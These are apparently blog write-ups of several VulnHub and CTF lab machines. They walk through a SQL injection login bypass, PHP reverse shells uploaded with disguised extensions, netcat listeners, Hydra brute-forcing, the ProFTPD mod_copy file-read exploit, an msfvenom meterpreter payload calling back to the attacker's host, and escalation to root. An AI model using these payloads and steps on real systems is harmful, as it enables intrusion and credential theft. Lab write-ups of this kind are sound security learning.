………………snip…………………..[22:48:52][INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'[22:48:52][INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)'[22:49:03][INFO](custom) POST parameter '#1*' seems to be 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)' injectable
Fuzzing with Burp Intruder shows me that certain keywords appear to be filtered such as ‘AND’ and ‘OR’.
Perhaps we can bypass the login?
Statements such as ‘ OR ‘a’=’a’ would not work based on the keyword filtering. Special characters appeared to be filtered as well. Many many fuzzing attempts and I finally was able to log in directly with the following string: ‘%20#;–%20- which would be the following without the URL encoding:
' #;-- -
Basically, the single quote would force bypass the password check and log me in directly as the first user in the database by executing a query such as this:
"SELECT * FROM users WHERE username='$username' AND password='$password'"
but terminating after the username check and commenting out the remainder of the query. All you actually need was the ‘%20# as the remainder after the # would be superfluous.
I tried to upload a .php file but received the following error:
OK, lets try with a jpg file. I grabbed a php reverse shell and renamed it with a jpg extension and the system seemed to like it:
The page source gave me the location of the file:
I started a netcat listener and browsed to the file located at:
I found a the MySQL DB root password in the config.php file but that did not work either did any of the passwords in the database. I fired off SSH brute-forcing with Hydra and the ‘taviso’ user and went about my enumeration.
A search for world-writeable files showed that /etc/passwd was writeable.
www-data@hackday:/tmp$ find /!-path "*/proc/*"-perm -2-type f -print2>/dev/null</ ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
/etc/passwd
.........snip.........
Well, I should be able to edit this file and either set a new root password, add a user or change this user’s password. Let’s change taviso’s password.
I then grabbed the /etc/passwd file and created a quick shell script offline that would just echo out the contents of the file without losing any special characters:
Now I should be able to su to the user ‘taviso’ and from there elevate to root.
www-data@hackday:/tmp$ su taviso
su taviso
Password: pass123
taviso@hackday:/tmp$
Cool, that worked. Now we verify our sudo permissions for laughs. The user can perform any actions as root. Score!
taviso@hackday:/tmp$ sudo -l
[sudo] password for taviso:MatchingDefaults entries for taviso on hackday:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User taviso may run the following commands on hackday:(ALL : ALL) ALL
Now we just su to root and grab our prize:
taviso@hackday:/tmp$ sudo su
sudo su
[sudo] password for taviso: pass123
root@hackday:/tmp#
Google translate told me the flag text translates to “Congratulations, now the report begins.”
The md5 was a hash of “rio”.
Now for the heck of it I could SSH in directly as the ‘taviso’ user and have a further look around.
root@mrb3n:~# ssh taviso@192.168.253.138
taviso@192.168.253.138's password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
6 packages can be updated.
2 updates are security updates.
Last login: Sat Oct 29 23:07:00 2016
taviso@hackday:~$ sudo su
[sudo] password for taviso:
root@hackday:/home/taviso
Here is the function in config.php responsible for the authentication bypass. Sanitize your input!
function check_login($username,$password){
$username = str_ireplace("OR","", $username);
$username = str_ireplace("UNION","", $username);
$username = str_ireplace("AND","", $username);
$password = str_ireplace("'","",$password);
$sql_query ="SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
$result = mysqli_fetch_assoc(execute_query($sql_query));
$result = $result["ID"];if($result >=1){return $result;}else{return-1;}
And the MySQL credentials in cleartext in the config.php file:
function execute_query($sql){
$db_host ="127.0.0.1";
$db_name ="bank_database";
$db_user ="root";
$db_password ="NuCiGoGo321";
Enjoyable VM with a privilege escalation method I hadn’t seen on Vulhub yet. Thanks to r_73en for putting it together and sharing as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.
When knightmare asked me to test his latest boot2root based around Scottish culture/slang I jumped at the opportunity. Having chatted quite a bit and debugging issues on other VMs I had already picked up several colorful Scottish expressions but boy was I in for a ride!
As always I imported the VM and fired off an nmap scan. This one only gave me port 80 to work with.
Hitting the web server I was greeted by Willie from the Simpsons telling me to stay out of his server, we’ll see about that.
I checked the page source and noted down several hints including possible usernames and directories.
Images will open doors. Perhaps some stego or exif madness? I grabbed all the images down locally to have a look.
Amazing shot!
Well, the ‘flicks’ directory was forbidden:
…and the ‘telly’ directory gave me more clues (and confusion):
More hints. At this point my head was spinning!
Focusing on the phpinfo hint I tried browsing to /flicks/phpinfo.php but that would be too easy. Firing off Burp intruder with a list of known file extensions finally got me a hit for phpinfo.pht. Nice troll.
Sure enough I was able to use this technique to gain command execution:
I uploaded a PHP reverse shell but could not get it working (I’d come to find out why later on).
Turning to this great reverse shell cheat sheet I decided to use the trust mknod technique to fire myself a reverse shell.
Ok, now we’re in as www-data:
I was stuck here for quite some time, after much enumeration I took a look for SUID files and came up with a txt file in the /home/proclaimers directory, which was strange.
The file talked about wildcards. Possible privilege escalation?
Some more enumeration turned up a hint in the login.txt file, alluding to a password hidden within an image file. I had already checked out every image though!
Well, in this case knightmare was being literal and the password was right in front of me, in the form of the filename.
Once I switched over to the jkerr user I looked around quite a bit but did not find anything useful. Taking a look at the list of users I decided to Google for who cpgrogran could be.
Based on this Wikipedia article Clair Grogan was best known as the lead singer of a band ‘Altered Images’. After bouncing my head off the keyboard for some time, once again I had another password.
Once switched over to the cpgrogan user I was able to browse around the home directory and found yet another reference to wild cards.
At this point I needed to gain access as one more user, ‘proclaimers’. There were a few images left and the comment ‘images open doors’ was still burned in my mind so I pulled them down via Python 3 http.server (which btw I had to use because Knightmare removed the Python2 binary… thanks for that one )
The ‘promisedyouamiracle’ image appeared to have an interested base64 encoded string in the exif data.
The string decoded to ‘gemini’. C’mon password!
It worked! OK! Now I was in as theproclaimers, what was the next step?
Looking around forever I landed on an interesting shell script ‘numpties.sh’. The script showed why I had trouble with my PHP reverse shell as well as why I couldn’t use wget to upload anything haha. It shows us that any file named ‘semaphore’ placed in the /home/proclaimers/letterfromamerica directory would have its permissions changed to be own by root and the SUID bit set. Smells like privilege escalation. I also assumed that the shell script must be running on a cron job.
At this point I needed a simple binary that, once compiled and having the permissions/ownership changed with this cron job, could be leveraged to fire me a root shell.
I compiled it locally and downloaded it using Curl thanks to knightmare’s trolling.
I started up a netcat listener and waited. Not too long after I had a hit and had a root shell! Well, we all know by now that knightmare’s VMs are not over with root and this one was no exception! Onwards to the final flag…and on and on and on. More trolling, I was sweating by this time.
Eventually I got to the bottom of the rabbit hole and found a zip file with what I could only imagine would be a disk image inside.
Of course the zip was password protected and nothing worked. I went back and made a word list from everything I had seen so far. Nada! Eventually out of sheer desperation I tried ‘Teuchter’ and immediately wanted to strange knightmare through the screen.
The zip contained a virtual disk image. I tried to mount it, cut it up with strings and binwalk but nothing worked. Exploring a bit more with my shiny new root privileges gave me another hint within the crontabs file:
Some Googling showed me I could mount the disk image as a new drive and use the vmfs-tools package to explore it. I added the image as a new drive under sda2:
I then used vmfs-fuse to mount the drive and explore it:
root@mrb3n:~/Desktop/teuch# vmfs-fuse /dev/sdb1 /mnt/teuch
root@mrb3n:~/Desktop/teuch# cd /mnt/teuch/
Red Kola? Irn Bru? More hints!
Almost there..Check the ISO and remember password relates to the TV Advert you watched.
I took out the spaces but it’s 25 characters but the Wikipedia page will get it for you.
This was either another troll or knightmare was showing some mercy. From all the hints I was guessing the final flag was hidden inside the glass_ch.jpg image. I could probably pull it out with steghide but I still needed a 25 character password. After going back to the beginning and reviewing everything I had once again I came up with ‘madeinscotlandfromgirders’ as the password.
I copied the image file over to a Windows VM where I had steghide from a previous CTF and FINALLY had the “real” flag after so many “almosts”.
This was an awesome VM, a mixture of entertaining and extremely frustrating. I learned a bunch about Scottish culture and could finally decode some of the things knightmare was saying.
Thanks to knightmare for putting this challenge together as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.
Flag#1 – “Don’t go Home Frank! There’s a Hex on Your House”
Flag#2 – “Obscurity or Security? That is the Question”
Flag#3 – “During his Travels Frank has Been Known to Intercept Traffic”
Flag#4 – “A Good Agent is Hard to Find”
Flag#5 – “The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices”
Flag#6 – “Where in the World is Frank?”
Flag#7 – “Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!”
Flag#8 – “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!”
I always enjoy challenges like this with multiple flags as it helps to keep you going/on path.
I started off with an nmap scan to see what we were dealing with:
root@kali:~# nmap -A -p--Pn--open -T4 172.16.94.136StartingNmap7.25BETA2( https://nmap.org ) at 2016-11-11 09:08 ESTNmap scan report for172.16.94.136Hostis up (0.00039s latency).Not shown:65531 filtered ports,1 closed port
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18((Ubuntu))|_http-server-header:Apache/2.4.18(Ubuntu)|_http-title:SkyDogCon CTF 2016-CatchMeIfYouCan443/tcp open ssl/http Apache httpd 2.4.18((Ubuntu))|_http-server-header:Apache/2.4.18(Ubuntu)|_http-title:SkyDogCon CTF 2016-CatchMeIfYouCan| ssl-cert:Subject: commonName=NetworkSolutions EV Server CA 2/organizationName=NetworkSolutions L.L.C./stateOrProvinceName=VA/countryName=US
|Not valid before:2016-09-21T14:51:57|_Not valid after:2017-09-21T14:51:57|_ssl-date: TLS randomness does not represent time
22222/tcp open ssh OpenSSH7.2p2Ubuntu4ubuntu2.1(UbuntuLinux; protocol 2.0)| ssh-hostkey:|2048 b6:64:7c:d1:55:46:4e:50:e3:ba:cf:4c:1e:81:f9:db (RSA)|_ 256 ef:17:df:cc:db:2e:c5:24:e3:9e:25:16:3d:25:68:35(ECDSA)
MAC Address:00:0C:29:14:57:58(VMware)Device type: general purpose|phone|WAP|specialized|storage-misc
A web server listening on port 80 and 443 as well as an SSH service on a non-standard port.
I went a bit out of order with the flags so the clues do not match up exactly. I checked out the SSH service first and the banner gave up a flag.
root@kali:~# ssh 172.16.94.136-p 22222The authenticity of host '[172.16.94.136]:22222 ([172.16.94.136]:22222)' can't be established.
ECDSA key fingerprint is SHA256:DeCMZ74o5wesBHFLyaVY7UTCA7mW+bx6WroHm6AgMqU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[172.16.94.136]:22222' (ECDSA) to the list of known hosts.
###############################################################
# WARNING #
# FBI - Authorized access only! #
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
# All actions Will be monitored and recorded #
# Flag{53c82eba31f6d416f331de9162ebe997} #
###############################################################
root@172.16.94.136's password:
The flag was the MD5 of the word ‘encrypt’.
I spun my wheels for a while on the next flag, after running Burp and Dirbuster for a while and not coming up with anything new I decided to go file by file. One of the JavaScript files had an interesting comment, in Hex, which was one of the clues.
Decoding the Hex with Python gave me the next flag, which was the MD5 of ‘nmap’ which must be the hint for the SSH banner flag.
root@kali:~# python
Python2.7.12+(default,Sep12016,20:27:38)[GCC 6.2.020160822] on linux2
Type"help","copyright","credits"or"license"for more information.>>>"666c61677b37633031333230373061306566373164353432363633653964633166356465657d".decode('hex')'flag{7c0132070a0ef71d542663e9dc1f5dee}'>>>
Dirbuster turned up a protected page. Browsing to it gave me an error message. My first thought was changing my user-agent. I first attempted with Burp Intruder and a large user-agent list but did not get any hits.
Digging around for quite some time led me back to the same JavaScript file with some more interesting comments. The FBI page was expecting my UA to be IE 4.0. Super secure!
Changing my UA to IE 4.0 in Burp Repeater got me access to the FBI Portal page.
I set up a match/replace rule in Burp to make it easier to browse the site directly.
The FBI Portal page was all static content, but I did get the next flag (which cracked to ‘evidence’) as well as a clue “new+flag”.
Following the hint brought me to a password protected page.
Basic-auth can be brute-forced with Burp Intruder but I first needed a username. The JavaScript file from earlier gave us a user name and the login prompt states “FBI Personnel” so I followed the username format and configured Intruder to attempt a brute-force with the user ‘carl.hanratty’.
I set up Burp like so:
The username in position 1 with a ‘:’ separate and base64 encoding to properly format the payloads for basic-auth.
I used a large wordlist and eventually got a hit, the 301 redirect indicated a successful login.
I was greeted with an FBI evidence page which gave me my next flag (which cracked to ‘panam’).
As well as a PDF document that did not yield anything upon inspection.
As with all CTFs, I have gotten in the habit of checking images for hidden data with strings, exiftool, steghide, binwalk, etc. Running binwalk against this image file indicated the presence of something embedded. I attempted to carve it up for a while and didn’t get anywhere.
root@kali:~/Desktop/skyconCTF# binwalk -e image.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------00x0 JPEG image data, JFIF standard 1.0122143200x21C9B0MySQL MISAM compressed data file Version10
I took a stab with steghide but did not have the passphrase. I eventually had a facepalm moment when trying ‘panam’. I extracted the flag.txt file and had the next flag as well as what appeared to be 2 passwords. But for what? It had to be the SSH service as the rest of the web application appeared static but I did not have user name.
root@kali:~/Desktop/skyconCTF# steghide extract -sf image.jpg -p panam
wrote extracted data to "flag.txt".
root@kali:~/Desktop/skyconCTF# cat flag.txt
flag{d1e5146b171928731385eb7ea38c37b8}=ILoveFrance
clue=iheartbrenda
Google showed that the ‘fastest man alive’ clue was potentially talking about the Flash, also known as Barry Allen. Google further turned up that Barry Allen was an alias used by Frank Abagnale in the movie to trick the FBI agent tracking him. I put together a list of potential usernames based on all the aliases I could find from the movie and tried various formats.
Trying each of this usernames combined with ‘ILoveFrance’ and ‘iheartbrenda’ eventually got me a successful login: barryallen:iheartbrenda. Logging in got me the next flag.
root@kali:~/Desktop/skyconCTF# ssh barryallen@172.16.94.136 -p 22222################################################################ WARNING ## FBI - Authorized access only! # # Disconnect IMMEDIATELY if you are not an authorized user!!! ## All actions Will be monitored and recorded ## Flag{53c82eba31f6d416f331de9162ebe997} ################################################################
barryallen@172.16.94.136's password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-38-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
14 packages can be updated.
7 updates are security updates.
/usr/bin/xauth: file /home/barryallen/.Xauthority does not exist
barryallen@skydogconctf2016:~$
barryallen@skydogconctf2016:~$ ls
flag.txt security-system.data
barryallen@skydogconctf2016:~$ cat flag.txt
flag{bd2f6a1d5242c962a05619c56fa47ba6}
This MD5 cracked to ‘theflash’.
There was also a large zip file in the user’s home directory which I transferred off using SCP to work on locally.
barryallen@skydogconctf2016:~$ file security-system.data
security-system.data:Zip archive data, at least v2.0 to extract
root@kali:~/Desktop/skyconCTF# scp -P 22222 barryallen@172.16.94.136:/home/barryallen/security-system.data /root/Desktop/skyconCTF################################################################ WARNING ## FBI - Authorized access only! # # Disconnect IMMEDIATELY if you are not an authorized user!!! ## All actions Will be monitored and recorded ## Flag{53c82eba31f6d416f331de9162ebe997} ################################################################
barryallen@172.16.94.136's password:
security-system.data 100% 71MB 80.0MB/s 00:00
I unzipped the file and ran it through binwalk (which ended up crashing my VM) due to the size), whoops.
The file appeared to be a memory dump. I haven’t done much forensics so I turned to Google and came up with Volatility on Kali which seems to be a go-to for analyzing memory dumps.
I first had to check the image info to figure out the operating system the dump came from and set up a profile moving forward.
root@kali:~/Desktop/skyconCTF# volatility imageinfo -f security-system.data VolatilityFoundationVolatilityFramework2.5
INFO : volatility.debug :Determining profile based on KDBG search...SuggestedProfile(s):WinXPSP2x86,WinXPSP3x86(InstantiatedwithWinXPSP2x86)
AS Layer1: IA32PagedMemoryPae (Kernel AS)
AS Layer2:FileAddressSpace(/root/Desktop/skyconCTF/security-system.data)
PAE type : PAE
DTB :0x33e000L
KDBG :0x80545b60LNumber of Processors:1ImageType(ServicePack):3
KPCR for CPU 0:0xffdff000L
KUSER_SHARED_DATA :0xffdf0000LImage date and time :2016-10-1022:00:50 UTC+0000Imagelocal date and time :2016-10-1018:00:50-0400
I next used the ‘files’ plugin and dumped out all the file names.
I grepped for ‘flag.txt’, ‘flag’ and just ‘.txt’ until I got several hits. Code.txt looked particularly promising. Looking at the plugin list I noticed one for checking command line history. Running it got me another Hex string.
Once again I was able to use Python to decode the Hex and grab the last flag.
root@kali:~/Desktop/skyconCTF# pythonPython2.7.12+(default,Sep12016,20:27:38)[GCC 6.2.020160822] on linux2
Type"help","copyright","credits"or"license"for more information.>>>"666c61677b38343164643364623239623066626264383963376235626537363863646338317d".decode('hex')'flag{841dd3db29b0fbbd89c7b5be768cdc81}'>>>
Flag 3 kept me stumped, I ran Wireshark and Ettercap for while since it seemed to allude to traffic sniffing, but no luck. I dug around the file system for a while and did not notice any services calling out. Eventually I took a look at the Apache configuration and found flag3 hidden inside the apache.crt file.
I decoded the base64 in Burp which gave me the MD5 of ‘personnel’. Luckily I found that page with Dirbuster or I would have been quite stuck.
This was a fun challenge and I got to play around with forensics tools a bit. I spent quite some time going through the memory dump with Volatility afterwards, really cool stuff.
Thanks to @jamesbower for putting this challenge together as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.
A while back knightmare asked me to test his boot2root challenge named Violator. Having thoroughly enjoyed his first 3 Droopy, Gibson and Sidney I jumped at the opportunity.
Like his other VMs it had a theme, this one being Depeche Mode themed.
When testing a boot2root I typically approach it as any other challenge, only stopping along the way if I feel I discover a flaw/unintended path, something appears to be broken or I just 100% hit a wall.
Knightmare provided me with the following hints to get going (I’ve also learned by now to set the HDD on all his VMs to non-persistent ) :
Vince Clarke can help you with the Fast Fashion.
The challenge isn’t over with root. The flag is something special.
I have put a few trolls in, but only to sport with you.
Without further ado, here goes:
As always, we start off with a quick nmap scan. This one turns up an FTP service and Apache web server.
root@mrb3n:/# nmap -sV 192.168.110.183StartingNmap6.49BETA4( https://nmap.org ) at 2016-09-16 10:13 EDTNmap scan report for192.168.110.183Hostis up (0.00011s latency).Not shown:998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD1.3.5rc380/tcp open http Apache httpd 2.4.7((Ubuntu))
MAC Address:00:0C:29:7D:C7:3C(VMware)ServiceInfo: OS:Unix
The web server is pretty sparse. There is an image of Foghorn Leghorn from Looney Tunes as well as a link to a Wikipedia page about the Depeche Mode album ‘Violator, which I can only assume is a hint for later.
root@mrb3n:~# curl -s http://192.168.110.183<html><title>I Say... I say... I say Boy!You pumpin' for oil or somethin'...?</title><body><br>I Say.. I say... I say boy!You're barkin up the wrong tree!</br>
<img src="foggie.jpg" alt="foggie.jpg" height=1041" width="731">
<-- https://en.wikipedia.org/wiki/Violator_(album) -->
</body>
</html>
I pulled down the image and checked it with exiftool but did not find any hidden treasures.
Leaving the web server aside and taking a look at the FTP service banner, I find a ProFTPD 1.3.5 File Copy exploit over on exploit-db. Maybe I can use this to pull down something interesting?
I attempt to connect anonymously and get rejected so let’s try out this exploit. If successful, I will be able to use the mod_copy module SITE CPFR/SITE CPTO commands to read/write files remotely and unauthenticated.
root@mrb3n:~# ftp 192.168.110.183Connected to 192.168.110.183.220ProFTPD1.3.5rc3Server(Debian)[::ffff:192.168.110.183]Name(192.168.110.183:root): anonymous
331Password required for anonymous
Password:530Login incorrect.Login failed.Remote system type is UNIX.Using binary mode to transfer files.
ftp>
I go after /etc/passwd first.
ftp> site CPFR /etc/passwd
350Fileor directory exists, ready for destination name
ftp> site CPTO /var/www/html/passwd
250Copy successful
ftp>
Awesome! The web root is writeable and I was able to grab down a list of usernames.
So here we have a list of local usernames, which happen to be the members of Depeche Mode. I attempted to grab /etc/shadow but was denied. I grabbed the groups file to see what types of permissions each users have on the target system.
ftp> site CPFR /etc/group350Fileor directory exists, ready for destination name
ftp> site CPTO /var/www/html/group250Copy successful
root@mrb3n:~/violator# curl -s http://192.168.110.183/group>group
root@mrb3n:~/violator# cat group | grep sudo
sudo:x:27:dg
The user dg is in the sudoers group so hopefully we can get his creds somehow! At this point I figured I needed some sort of wordlist. The Wikipedia page in the index page source seems like a good candidate. Firing up Cewl I put together a quick wordlist.
This wordlist didnt get me anywhere. After some fumbling around with various combinations I settled on a wordlist of with all of the song titles, lowercase, without spaces or special characters. First we remove all spaces.
root@mrb3n:~/violator# sed 's///g' violator > violator_nospaces
We can clean things up a bit more with cut and tr.
Interesting enough Hydra finds valid passwords for all 4 users. Dg is my target so let’s check his account first.
root@mrb3n:~/violator# hydra -L users -P violator_list ftp://192.168.110.183Hydra v8.1(c)2014by van Hauser/THC -Pleasedonotusein military or secret service organizations,orfor illegal purposes.Hydra(http://www.thc.org/thc-hydra) starting at 2016-09-16 14:00:35[DATA] max 16 tasks per 1 server, overall 64 tasks,96 login tries (l:4/p:24),~0 tries per task
[DATA] attacking service ftp on port 21[21][ftp] host:192.168.110.183 login: dg password: policyoftruth
[21][ftp] host:192.168.110.183 login: mg password: bluedress
[21][ftp] host:192.168.110.183 login: af password: enjoythesilence
[21][ftp] host:192.168.110.183 login: aw password: sweetestperfection
1 of 1 target successfully completed,4 valid passwords found
Logging in I am in dg’s home directory and am able to change to various other directories, including those for our other 3 users.
root@mrb3n:~# ftp 192.168.110.183Connected to 192.168.110.183.220ProFTPD1.3.5rc3Server(Debian)[::ffff:192.168.110.183]Name(192.168.110.183:root): dg
331Password required for dg
Password:230User dg logged inRemote system type is UNIX.Using binary mode to transfer files.
ftp> pwd
257"/home/dg"is the current directory
ftp> ls
200 PORT command successful
150Opening ASCII mode data connection for file list
drwxr-xr-x 10 root root 4096Jun620:31 bd
226Transfer complete
ftp> cd ..250 CWD command successful
ftp> ls
200 PORT command successful
150Opening ASCII mode data connection for file list
drwxr-xr-x 3 af af 4096Jun1209:25 af
drwxr-xr-x 2 aw aw 4096Jun1209:25 aw
drwxr-xr-x 4 dg dg 4096Jun1418:55 dg
drwxr-xr-x 2 mg mg 4096Jun1209:28 mg
I pull down various files for inspection locally.
ftp>get minarke-1.21.tar.bz2
local: minarke-1.21.tar.bz2 remote: minarke-1.21.tar.bz2
200 PORT command successful
150Opening BINARY mode data connection for minarke-1.21.tar.bz2 (15576 bytes)226Transfer complete
15576 bytes received in0.01 secs (2.7953 MB/s)150Opening ASCII mode data connection for file list
-rw-rw-r--1 aw aw 59Jun1209:19 hint
226Transfer complete
ftp>get hint
local: hint remote: hint
150Opening ASCII mode data connection for file list
-rw-rw-r--1 mg mg 112Jun1209:28 faith_and_devotion
226Transfer complete
ftp>get faith_and_devotion
local: faith_and_devotion remote: faith_and_devotion
200 PORT command successful
150Opening BINARY mode data connection for faith_and_devotion (112 bytes)226Transfer complete
Dg’s home directory contains a more extensive directory listing which we’ll have to come back to later.
ftp> ls
200 PORT command successful
150Opening ASCII mode data connection for file list
drwxr-xr-x 2 root root 4096Jun620:31 bin
drwxr-xr-x 2 root root 4096Jun620:46 etc
drwxr-xr-x 3 root root 4096Jun620:31 include
drwxr-xr-x 4 root root 4096Jun620:31 lib
drwxr-xr-x 2 root root 4096Jun620:31 libexec
drwxr-xr-x 2 root root 4096Jun620:31 sbin
drwxr-xr-x 4 root root 4096Jun620:31 share
drwxr-xr-x 2 root root 4096Jun622:17var
Taking a look at our loot, the hint file is a bit vague…for now…
root@mrb3n:~/violator# cat hintYou are getting close...Can you crack the final enigma..?
The Minarke archive is interesting a C file and make file for compiling an Enigma M4 emulator. We know that knightmare is infamous for flag challenges so I am almost certain this will come into play later.
root@mrb3n:~/violator/minarke-1.21# cat minarke.c /* Minarke, an Enigma M4 emulator
*
* Written by John Gilbert
* Version 1.21
* (c) 2008
I compile it and check out the binary. Our suspicions are confirmed. this can be used to crack some Enigma code. Pretty awesome. Now lets find that code!
root@mrb3n:~/violator/minarke-1.21# make
gcc -g -Wall-o minarke minarke.c
root@mrb3n:~/violator/minarke-1.21# ./minarke Minarke, an Enigma M4 emulator
byJohnGilbertEmulates the Kriegsmarine M4 Enigma encryption machine
InitialSetupNotesRotors:Reflector(B/C),ThinRotor(B/G),3Rotors(1-8, can't reuse them)
Use BB### or CG### with A### settings to read/create Wehrmacht three rotor traffic
Ring and position settings: A-Z for each of the 4 rotors
Reflector setting is always fixed at A.
Plugboard settings: A-Z,A-Z pairs, also won't allow reuse
Hitreturn to end input,11 pairs recomended for maximum security.Hit ESC at any time to quit.SpecialKeys(during input mode)1: rewind one setting
2: reset position settings
3:new position settings
4:new setup
9: toggle debug
0: show position settings
?: show help
see http://en.wikipedia.org/wiki/Enigma_machine
also http://www.bytereef.org/m4_project.htmlRotors:
The faith_and_devotion file contains what we need to use the Enigma machine once we have the code.
root@mrb3n:~/violator# cat faith_and_devotion Lyrics:*UseWermachtwith3 rotors
*Reflector to B
Initial: A B C
AlphabetRing: C B A
PlugBoard A-B, C-D
Now I need a shell. Since /var/www/html appears to be writeable. I attempt to upload a PHP reverse shell. If all goes well and knightmare doesnt have any tricks up his sleeve I should be able to grab a nice reverse shell.
root@mrb3n:~# ftp 192.168.110.183Connected to 192.168.110.183.220ProFTPD1.3.5rc3Server(Debian)[::ffff:192.168.110.183]Name(192.168.110.183:root): dg
331Password required for dg
Password:230User dg logged inRemote system type is UNIX.Using binary mode to transfer files.
ftp> cd /var/www/html
250 CWD command successful
ftp> ls
200 PORT command successful
150Opening ASCII mode data connection for file list
-rw-rw-r--1 dg dg 51256Jun620:00 foggie.jpg
-rw-r--r--1 proftpd nogroup 699Sep1617:39group-rw-rw-r--1 dg dg 318Jun1217:26 index.html
-rw-r--r--1 proftpd nogroup 1330Sep1615:24 passwd
226Transfer complete
ftp> put /var/www/html/violator.php
local:/var/www/html/violator.php remote:/var/www/html/violator.php
200 PORT command successful
150Opening BINARY mode data connection for/var/www/html/violator.php
226Transfer complete
3463 bytes sent in0.00 secs (33.0257 MB/s)
ftp> ls
200 PORT command successful
150Opening ASCII mode data connection for file list
-rw-rw-r--1 dg dg 51256Jun620:00 foggie.jpg
-rw-r--r--1 proftpd nogroup 699Sep1617:39group-rw-rw-r--1 dg dg 318Jun1217:26 index.html
-rw-r--r--1 proftpd nogroup 1330Sep1615:24 passwd
-rw-r--r--1 dg dg 3463Sep1618:18 violator.php
226Transfer complete
I browse to my violator.php reverse shell script and sure enough get a connection as www-data.
root@mrb3n:~/violator# curl -s http://192.168.110.183/violator.php
root@mrb3n:~# nc -lvnp 443
listening on [any]443...
connect to [192.168.110.179]from(UNKNOWN)[192.168.110.183]33641Linux violator 3.19.0-25-generic#26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux19:20:09 up 3:00,0 users, load average:0.00,0.01,0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh:0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@violator:/$
I su to the dg user and check what he is able to run as root, since I remembered from earlier that he is part of the sudoers group. Interesting, he can run another version of proftpd as root which what we saw earlier in his home directory.
www-data@violator:/$ su dg
su dg
Password: policyoftruth
dg@violator:/$ sudo -l
sudo -l
MatchingDefaults entries for dg on violator:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User dg may run the following commands on violator:(ALL) NOPASSWD:/home/dg/bd/sbin/proftpd
We now have another service running locally on port 2121. How can this be abused to gain root privs?
dg@violator:~/bd/sbin$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)ActiveInternet connections (servers and established)ProtoRecv-Q Send-Q LocalAddressForeignAddressState PID/Program name
tcp 00127.0.0.1:21210.0.0.0:* LISTEN -
tcp 0218192.168.110.183:33641192.168.110.179:443 ESTABLISHED 1391/bash
tcp6 00:::21:::* LISTEN -
tcp6 00:::80:::* LISTEN -
tcp6 00192.168.110.183:80192.168.110.179:56414 ESTABLISHED -
tcp6 00192.168.110.183:21192.168.110.179:56886 ESTABLISHED -
Connection to port 2121 locally I see we are dealing with ProFTPD 1.3.3c.
dg@violator:~/bd/sbin$ telnet 127.0.0.12121
telnet 127.0.0.12121Trying127.0.0.1...Connected to 127.0.0.1.Escape character is'^]'.220ProFTPD1.3.3cServer(DepecheModeViolatorServer)[127.0.0.1]
This particular FTP client has a known backdoor command execution vulnerability which hopefully we can use to escalate privileges. There are many ways to do this, the way I did it worked but of course there are other options
It looks like I will need Metasploit to take advantage of this exploit so I quickly create a meterpreter PHP payload and upload it to the target, execute and grab a meterpreter shell.
root@mrb3n:/var/www/html# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.179 LPORT=8443 -f raw > violator_meterp.php
root@mrb3n:/var/www/html# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.179 LPORT=8443 -f raw > violator_meterp.php
I could have used FTP to transfer the file, but after seeing that knightmare was kind enough to remove curl and wget I had to find another way.
Connection closed by foreign host.
dg@violator:~/bd/sbin$ wget http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php< http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php The program 'wget'is currently not installed.You can install it by typing:
sudo apt-get install wget
dg@violator:~/bd/sbin$ curl -O http://192.168.110.179/violator_meterp.php
curl -O http://192.168.110.179/violator_meterp.phpThe program 'curl'is currently not installed.You can install it by typing:
sudo apt-get install curl
SCP was still installed so I was able to transfer the file that way, as root which is super secure!
Executing the shell I gain a connection and its time to set up some port forwarding so I can attack remote port 2121 directly.
dg@violator:/var/www/html$ phpviolator_meterp.php
msf exploit(handler)> exploit
[*]Started reverse TCP handler on 192.168.110.179:8443[*]Starting the payload handler...[*]Meterpreter session 1 opened (192.168.110.179:8443->192.168.110.183:35213) at 2016-09-1614:50:38-0400
I use the built-in meterpreter portfwd command to set up the tcp relay.
msf exploit(proftpd_133c_backdoor)> exploit
[*]Started reverse TCP handler on 192.168.110.179:4444[*]SendingBackdoorCommand[*]Command shell session 6 opened (192.168.110.179:4444->192.168.110.183:44484) at 2016-09-1615:59:57-0400
id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
python -c 'import pty;pty.spawn("/bin/bash")'
root@violator:/#
